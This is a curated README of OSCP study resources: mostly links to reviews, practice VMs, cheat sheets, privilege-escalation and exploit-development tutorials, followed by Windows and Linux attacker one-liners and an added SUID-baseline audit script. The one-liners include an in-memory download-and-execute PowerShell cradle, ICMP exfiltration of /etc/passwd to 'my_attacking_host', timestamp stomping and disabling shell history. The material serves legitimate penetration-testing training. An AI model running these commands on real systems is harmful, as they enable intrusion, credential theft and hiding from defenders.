# OSCP-Archives

During my journey to getting the OSCP, I have come across many articles, Git repos, videos, and other sources of great and valuable information that helped me during my studies. While having all of these in a bookmark folder is great, I also wanted to build a curated list of the resources I've collected over time, all in one place for everyone to access.

This list will continue to grow over time as I come across new resources. If you know of more resources or want me to add yours, please let me know and I'll add them in.

PS. A VERY big **thank you** to all the authors of these resources, for taking the time and energy to put this invaluable information together.

## Enjoy!


### ~ Official Exam Guide ~

[`OSCP Certification Exam Guide`](https://support.offensive-security.com/oscp-exam-guide/#exam-restrictions) - **Offensive Security**



### ~ Reviews and Experiences ~

[`31 Days of OSCP Experience`](https://0xdarkvortex.dev/index.php/2018/04/17/31-days-of-oscp-experience/) - **[ParanoidNinja](https://twitter.com/ninjaparanoid)**

[`Detailed Guide on OSCP Prep – From Newbie to OSCP`](http://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/) - **Ramkisan Mohan**

[`Offensive Security Certified Professional – Lab and Exam Review`](https://theslickgeek.com/oscp/) - **[theslickgeek](https://twitter.com/theslickgeek)**

[`Passing The OSCP`](https://pinkysplanet.net/reflection-on-passing-the-oscp/amp/?__twitter_impression=true) - **[Pink_Panther](https://twitter.com/Pink_P4nther)**

[`OSCP Experience and the first torture!`](https://www.peerlyst.com/posts/oscp-experience-and-the-first-torture-nitesh-shilpkar-osce-oscp-oswp-ceh-crest) - **Nitesh Shilpkar**



### ~ Helpful VMs for Practice ~

[`Kioptrix`](https://sushant747.gitbooks.io/total-oscp-guide/content/) - **[loneferret](https://twitter.com/loneferret)**

[`OSCP-like Vulnhub VMs`](https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms.html) - **[abatchy](https://twitter.com/abatchy17)**

[`OSCP Training VMs hosted on Vulnhub.com`](https://medium.com/@andr3w_hilton/oscp-training-vms-hosted-on-vulnhub-com-22fa061bf6a1) - **Andrew Hilton**

[`Pinky's Palace CTFs`](https://pinkysplanet.net/tag/ctf/) - **[Pink_Panther](https://twitter.com/Pink_P4nther)**

[`Hack The Box OSCP-like VMs`](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159) - **[Tony](https://twitter.com/TJ_Null)**



### ~ CTF Walkthroughs & Educational Videos ~

[`Hack The Box CTFs`](https://www.youtube.com/ippsec) - **[ippsec](https://twitter.com/ippsec)**

[`Search Ippsec's Videos for Specific Topics`](https://ippsec.rocks/#) - **[ippsec](https://twitter.com/ippsec)**

[`Hack The Box, Over The Wire, Other CTFs`](https://www.youtube.com/derekrook) - **[derekrook](https://twitter.com/derekrook)**

[`VulnHub Walkthroughs`](https://highon.coffee/blog/walkthroughs/) - **[Arr0way](https://twitter.com/Arr0way)**



### ~ OSCP Prep, Tools, Cheatsheets, Guides, etc. ~

[`Metasploit Unleashed`](https://www.offensive-security.com/metasploit-unleashed/) - **Offensive Security**

[`15 Ways to Download a File`](https://blog.netspi.com/15-ways-to-download-a-file/) - **[NetSPI](https://twitter.com/NetSPI)**

[`Explain Shell - Great at explaining Linux Commands in Detail`](https://www.explainshell.com/) - **Idan Kamara**

[`Mixed Archives`](https://blog.g0tmi1k.com/archives/) - **[g0tmi1k](https://twitter.com/g0tmi1k)**

[`OWASP Testing Guide v4 Table of Contents`](https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents) - **[owasp](https://twitter.com/owasp)**

[`Penetration Testing Tools Cheat Sheet`](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/) - **[Arr0way](https://twitter.com/Arr0way)**

[`Reverse Shell Cheat Sheet`](https://highon.coffee/blog/reverse-shell-cheat-sheet/) - **[Arr0way](https://twitter.com/Arr0way)**

[`Linux Commands Cheat Sheet`](https://highon.coffee/blog/linux-commands-cheat-sheet/) - **[Arr0way](https://twitter.com/Arr0way)**

[`Reverse Shell Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) - **Pentest Monkey**

[`Black Room Sec - CTFs, Guides, Tools`](https://www.blackroomsec.com/) - **[blackroomsec](https://twitter.com/blackroomsec)**

[`Dostoevskylabs's PenTest Notes`](https://dostoevskylabs.gitbooks.io/dostoevskylabs-pentest-notes/content/) - **Dostoevskylabs**

[`Pentest Compilation`](https://github.com/adon90/pentest_compilation) - **adon90**

[`SecLists`](https://github.com/danielmiessler/SecLists) - **danielmiessler**

[`OSCP-Prep`](https://github.com/burntmybagel/OSCP-Prep) - **burntmybagel**

[`OSCP-Prep`](https://github.com/rhodejo/OSCP-Prep) - **rhodejo**

[`OSCP Scripts`](https://github.com/garyhooks/oscp) - **garyhooks**

[`OSCP Scripts & Documents`](https://github.com/ihack4falafel/OSCP) - **ihack4falafel**

[`OSCP Recon Script`](https://github.com/xapax/oscp) - **xapax**

[`Cheatsheet-God`](https://github.com/OlivierLaflamme/Cheatsheet-God) - **OlivierLaflamme**

[`OSCP-Repo`](https://github.com/rewardone/OSCPRepo) - **rewardone**

[`Cheatsheets`](https://github.com/slyth11907/Cheatsheets) - **slyth11907**

[`OSCP tricks`](https://hackingandsecurity.blogspot.com/2017/09/oscp-tricks.html) - **WarLord**

[`Go-For-OSCP`](https://hackingandsecurity.blogspot.com/2017/08/go-for-oscp.html) - **WarLord**

[`How to prepare for the OSCP? A STUDY PLAN`](https://www.peerlyst.com/posts/how-to-prepare-for-the-oscp-a-study-plan-magda-chelly-ph-d?utm_source=LinkedIn&utm_medium=Application_Share&utm_content=peerlyst_post&utm_campaign=peerlyst_shared_post) - **Magda CHELLY, CISSP, Ph.D**

[`OSCP useful Links`](https://backdoorshell.gitbooks.io/oscp-useful-links/content/) - **backdoorshell**

[`Total OSCP Guide`](https://sushant747.gitbooks.io/total-oscp-guide/content/) - **sushant747**

[`OSCP Course & Exam Preparation`](https://411hall.github.io/OSCP-Preparation/) - **[411Hall](https://twitter.com/411Hall)**

[`OSCP Journey: Python Code Challenges`](https://www.peerlyst.com/posts/oscp-journey-python-code-challenges-elias-ibrahim-cissp?utm_source=linkedin&utm_medium=social&utm_content=peerlyst_post&utm_campaign=peerlyst_shared_post) - **Elias Ibrahim**

[`SMB Enumeration Checklist`](https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html) - **[0xdf](https://twitter.com/0xdf_)**

[`Tunneling and Pivoting`](https://0xdf.gitlab.io/2018/11/02/pwk-notes-tunneling.html) - **[0xdf](https://twitter.com/0xdf_)**

[`Tunneling and Port Forwarding`](https://book.hacktricks.xyz/tunneling-and-port-forwarding) - **HackTricks**

[`Post-Exploitation Windows File Transfers with SMB`](https://0xdf.gitlab.io/2018/10/11/pwk-notes-post-exploitation-windows-file-transfers.html) - **[0xdf](https://twitter.com/0xdf_)**

[`Multiple Ways to Exploit Tomcat Manager`](https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/) - **[Raj Chandel](https://twitter.com/rajchandel)**

[`PHP Web Shell`](https://github.com/WhiteWinterWolf/wwwolf-php-webshell) - **WhiteWinterWolf**

[`Msfvenom Cheat Sheet`](https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/) - **[LucianNitescu](https://twitter.com/LucianNitescu)**

[`Linux Shells`](https://book.hacktricks.xyz/shells/linux) - **HackTricks**

[`Windows Shells`](https://book.hacktricks.xyz/shells/windows) - **HackTricks**

[`Dumping Clear-Text Credentials`](https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/) - **Pentestlab**

[`OSCP Exam Report Template in Markdown`](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown) - **noraj**

[`OSCP Omnibus`](https://github.com/alexiasa/oscp-omnibus/) - **alexiasa**


### ~ Brute Force ~

[`Brute Force - CheatSheet`](https://book.hacktricks.xyz/brute-force) - **HackTricks**



### ~ Checklists ~

[`Checklist - Linux Privilege Escalation`](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist) - **HackTricks**

[`Checklist - Local Windows Privilege Escalation`](https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation) - **HackTricks**



### ~ SQL Injection ~

[`Preliminary SQL Injection Part 1`](https://jtnydv.xyz/2018/12/25/preliminary-sql-injection-part-1/) - **Jatin Yadav**

[`Preliminary SQL Injection Part 2`](https://jtnydv.xyz/2018/12/27/preliminary-sql-injection-part-2/) - **Jatin Yadav**

[`Informix SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet) - **pentestmonkey**

[`MSSQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) - **pentestmonkey**

[`Oracle SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet) - **pentestmonkey**

[`MySQL SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) - **pentestmonkey**

[`Postgres SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) - **pentestmonkey**

[`DB2 SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet) - **pentestmonkey**

[`Ingres SQL Injection Cheat Sheet`](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet) - **pentestmonkey**

[`SQL Injection Reference Library & Techniques`](http://www.sqlinjection.net/what-is/) - **SQLINjection**



### ~ Linux Privilege Escalation ~

[`OSCP - Linux Priviledge Escalation`](https://hackingandsecurity.blogspot.com/2017/09/oscp-linux-priviledge-escalation.html?m=1) - **WarLord**

[`Basic Linux Privilege Escalation`](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - **[g0tmi1k](https://twitter.com/g0tmi1k)**

[`Linux Priv escalation`](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) - **carlospolop**

[`Linux Privilege Escalation`](https://book.hacktricks.xyz/linux-unix/privilege-escalation) - **HackTricks**



### ~ Windows Privilege Escalation ~

[`OSCP - Windows Priviledge Escalation`](https://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) - **WarLord**

[`Awesome-Windows-Exploitation`](https://github.com/enddo/awesome-windows-exploitation) - **enddo**

[`Windows Priv escalation`](https://github.com/kyawthiha7/oscp_notes/blob/master/windows_priv_escalation.md) - **kyawthiha7**

[`Windows Privilege Escalation Fundamentals`](http://www.fuzzysecurity.com/tutorials/16.html) - **[FuzzySec (b33f)](https://twitter.com/FuzzySec)**

[`Windows Priv escalation`](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) - **carlospolop**

[`Windows Local Privilege Escalation`](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation) - **HackTricks**



### ~ LFI & RFI ~

[`PHP Local and Remote File Inclusion (LFI, RFI) Attacks`](https://hackingandsecurity.blogspot.com/2017/09/php-local-and-remote-file-inclusion-lfi.html) - **WarLord**

[`LFI Cheat Sheet`](https://highon.coffee/blog/lfi-cheat-sheet/) - **[Arr0way](https://twitter.com/Arr0way)**



### ~ Exploits & Exploit Development, Tutorials ~

[`Windows & Linux Exploit Development`](http://www.fuzzysecurity.com/tutorials.html) - **[FuzzySec (b33f)](https://twitter.com/FuzzySec)**

[`Exploit DB`](https://www.exploit-db.com/) - **Offensive Security**

[`Exploit Development - Starting from Part 1`](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - **Corelan Team**

[`Over The Wire - Wargames`](http://overthewire.org/wargames/) - **OverTheWire**

[`Unix Privilege Escalation Exploits`](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) - **Kabot**



### ~ Windows & Linux Kernel Exploits ~

[`Windows Kernel Exploits`](https://github.com/SecWiki/windows-kernel-exploits) - **SecWiki**

[`Linux Kernel Exploits`](https://github.com/lucyoa/kernel-exploits) - **lucyoa**



#### **[SecuritySift](https://twitter.com/SecuritySift)**

[`Windows Exploit Development – Part 1: The Basics`](https://www.securitysift.com/windows-exploit-development-part-1-basics/)

[`Windows Exploit Development – Part 2: Intro-Stack-Overflow`](https://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/)

[`Windows Exploit Development – Part 3: Changing-Offsets-and-Rebased-Modules`](https://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/)

[`Windows Exploit Development – Part 4: Locating-Shellcode-Jumps`](https://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/)

[`Windows Exploit Development – Part 5: Locating-Shellcode-Egghunting`](https://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting/)

[`Windows Exploit Development – Part 6: Seh-Exploits`](https://www.securitysift.com/windows-exploit-development-part-6-seh-exploits/)

[`Windows Exploit Development – Part 7: Unicode-Buffer-Overflows`](https://www.securitysift.com/windows-exploit-development-part-7-unicode-buffer-overflows/)



#### **[shogun_lab](https://twitter.com/shogun_lab)**

[`Zero Day Zen Garden: Windows Exploit Development - Part 0 [Dev Setup & Advice]`](http://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html)

[`Zero Day Zen Garden: Windows Exploit Development - Part 1 [Stack Buffer Overflow Intro]`](http://www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html)

[`Zero Day Zen Garden: Windows Exploit Development - Part 2 [JMP to Locate Shellcode]`](http://www.shogunlab.com/blog/2017/08/26/zdzg-windows-exploit-2.html)

[`Zero Day Zen Garden: Windows Exploit Development - Part 3 [Egghunter to Locate Shellcode]`](http://www.shogunlab.com/blog/2017/09/02/zdzg-windows-exploit-3.html)

[`Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]`](http://www.shogunlab.com/blog/2017/11/06/zdzg-windows-exploit-4.html)

[`Zero Day Zen Garden: Windows Exploit Development - Part 5 [Return Oriented Programming Chains]`](http://www.shogunlab.com/blog/2018/02/11/zdzg-windows-exploit-5.html)



### ~ Windows One-Liners ~ **[kindredsec](https://twitter.com/kindredsec)**

*Obtain the permission string (security descriptor) of all services*

`sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul`

*Obtain the path of the executable called by each Windows service (good for checking for unquoted service paths)*

`sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul`

*Forward traffic to an internal host*

`netsh interface portproxy add v4tov4 listenport=*port* listenaddress=*ip* connectport=*port* connectaddress=*ip*`

*Download and execute a remote PowerShell script (all in memory)*

`iex (New-Object Net.Webclient).DownloadString('*remote_file*')`

*Check the permissions of all binaries associated with services*

`$list = Get-WmiObject win32_service | select -ExpandProperty PathName | Select-String -NotMatch svchost; foreach ( $path in $list ) { icacls $path 2>$null | Select-String -NotMatch "Successfully processed" }`

*Enable RDP (may also need a firewall rule)*

`reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f`



### ~ Linux One-Liners ~ **[kindredsec](https://twitter.com/kindredsec)**

*Stomp a timestamp to match other install-time files*

`touch -a -m -t $(stat -c '%y' /bin/bash | cut -d ":" -f 1,2 | sed 's/[- :]//g') malicious_file.sh`

*Prevent the bash commands you run from being written to a history file*

`export HISTFILE=/dev/null`

*Exfiltrate users over ICMP*

`while read line; do ping -c 1 -p $(echo "$line" | cut -d ":" -f 1,2,3,7 | xxd -ps) my_attacking_host; done < /etc/passwd`

*Locate MySQL credentials within web files*

`egrep -ri '(mysql_connect\(|mysqli_connect\(|new mysqli\(|PDO\(\"mysql:)' /var/www/* 2> /dev/null`

*List all the SUID binaries on a system*

`find / -perm -4000 2>/dev/null`

*Create iptables rules to transparently route traffic destined for a specific port to an internal host*

`iptables -t nat -A PREROUTING -i *interface* -p tcp --dport *port* -j DNAT --to-destination *remote_ip_address* && iptables -t nat -A POSTROUTING -o *interface* -p tcp --dport *port* -d *remote_ip_address* -j SNAT --to-source *local_ip_address*`

*List all running processes being run by users other than your current one*

`ps -elf | grep -v $(whoami)`

*List all system cronjobs*

`for i in d hourly daily weekly monthly; do echo; echo "--cron.$i--"; ls -l /etc/cron.$i; done`
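The `find / -perm -4000` one-liner above is the attacker's enumeration step; the same listing is just as useful on the defending side. The following is an added example (not part of this list and not kindredsec's code) that turns it into a baseline check: it records the SUID/SGID binaries under a directory tree once, then reports any that appear later, so an unexpected setuid binary shows up as a diff during a triage or a periodic audit. The function names and the baseline file path are assumptions made for this example.

```shell
# Added example: SUID/SGID baseline and diff (not from the OSCP-Archives list).
# list_setuid DIR        -> sorted list of SUID/SGID regular files under DIR
# suid_baseline DIR FILE -> save that list to FILE as the baseline
# suid_diff DIR FILE     -> print files present now but absent from FILE;
#                           returns 0 if nothing new, 1 if something new
#
# The listing is sorted so that comm(1) can compare it against the baseline;
# -xdev keeps find on one filesystem, which avoids crawling /proc and mounts.

list_setuid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

suid_baseline() {
    list_setuid "$1" > "$2"
}

suid_diff() {
    # comm -13: suppress lines only in the baseline (1) and lines in both (2),
    # leaving lines that are only in the current listing (read from stdin, "-").
    new=$(list_setuid "$1" | comm -13 "$2" -)
    if [ -n "$new" ]; then
        printf '%s\n' "$new"
        return 1
    fi
    return 0
}

# Typical use (assumed paths): save a baseline right after provisioning,
# then re-run the diff from cron or during incident triage.
#   suid_baseline / /var/lib/suid-baseline.txt
#   suid_diff / /var/lib/suid-baseline.txt || echo "new setuid binaries found"
```

Keep the baseline file somewhere the audited users cannot write, and refresh it after package upgrades, since legitimate updates also add or remove setuid binaries.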